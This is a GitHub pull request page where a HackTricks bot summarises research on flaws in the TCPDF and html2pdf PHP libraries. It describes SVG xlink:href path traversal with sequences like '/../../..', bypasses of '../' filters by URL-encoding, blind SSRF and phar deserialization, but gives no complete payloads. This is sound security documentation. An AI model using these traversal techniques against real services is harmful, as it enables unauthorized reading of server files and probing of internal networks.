Skip to content

Conversation

@carlospolop
Copy link
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

🎯 Content Summary

This blog post presents a deep-dive into security issues in HTML-to-PDF generators, focusing on the PHP libraries tecnickcom/TCPDF and spipu/html2pdf. The authors build a clear threat model: a PDF renderer typically sits at a trust boundary, parsing attacker-controlled HTML, loading images, SVGs, fonts, certificates, and external CSS, while having access to the local filesystem and internal network. They use two concrete files on the server to demonstrate impact:
🔧 Technical Details

1. Path traversal via SVG xlink:href in PDF engines
If a PDF library accepts untrusted HTML with embedded SVGs, and its SVG handler reads <image xlink:href="..."> into a filesystem path without robust traversal checks, an attacker can reference files with sequences like ../../... By embedding the SVG as a data URI (e.g. <img src="data:image/svg;base64,...">), the attacker can cause the renderer to load local files (e.g. /tmp/user_files/user_1/private_image.png) and embed them into the PDF. Where libraries prepend DOCUMENT_ROOT to paths starting with /, attackers can still use /../../.. to escape into arbitrary directories.


2. Bypassing naive "../" filters with URL-encoding
Many libraries attempt to block traversal by checking if a string contains "../" before accessing the filesy...

🤖 Agent Actions

Summary:

  • Expanded File Inclusion/Path Traversal guidance with a new “HTML-to-PDF SVG/IMG path traversal” section covering TCPDF/html2pdf attack surface, inline SVG payloads, traversal encoding bypasses, and multi-stage decoding tricks, plus added the Positive Technologies blog to the references.
  • Documented a new blind SSRF primitive on the SSRF page that leverages HTML-to-PDF renderers for internal HTTP probing, including payload examples, mitigation notes, a cross-link back to the new path-traversal section, and referenced the research blog.
  • Enhanced the PHP Deserialization + Autoload Classes page with a TCPDF destructor POP-chain walkthrough, a serialized payload example, an html2pdf/phar exploitation workflow, and added the same research reference via a new “References” section.

Tests: Not run (documentation-only changes).


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

@carlospolop
Copy link
Collaborator Author

🔗 Additional Context

Original Blog Post: https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/

Content Categories: Based on the analysis, this content was categorized under "Pentesting Web -> File Inclusion/Path Traversal (add SVG/HTML-to-PDF path traversal & encoding bypasses) and cross-linked in Pentesting Web -> SSRF and Pentesting Web -> Deserialization / PHP Tricks (Phar POP chains via filesystem functions).".

Repository Maintenance:

  • MD Files Formatting: 936 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants